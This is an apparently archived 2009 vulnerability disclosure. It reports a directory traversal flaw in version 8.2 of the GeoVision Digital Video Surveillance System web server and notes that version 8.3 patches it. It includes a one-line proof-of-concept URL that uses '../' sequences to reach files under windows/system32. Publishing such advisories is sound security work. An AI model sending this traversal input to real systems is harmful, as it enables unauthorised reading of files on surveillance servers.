GeoVision Digital Video Surveillance System (geohttpserver) DT Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : GeoVision Digital Video Surveillance System (geohttpserver) DT Vuln
# Published : 2009-02-11
# Author : Dejan Levaja
# Previous Title : GeoVision LiveX_v8200 ActiveX (LIVEX_~1.OCX) File Corruption PoC
# Next Title : ProFTPd with mod_mysql Authentication Bypass Vulnerability

Hi.
There is a Directory traversal vulnerability in Geovision Digital Video Surveillance
System (geohttpserver)version 8.2.

POC:
http://remotehost/../../../../../../windows/system32/whatever.something

PATCH:
Vendor has published the new version (8.3)


Regards,
Dejan Levaja 
NSS d.o.o.
dejan[dot]levaja[at]netsec[dot]rs

# www.Syue.com [2009-02-11]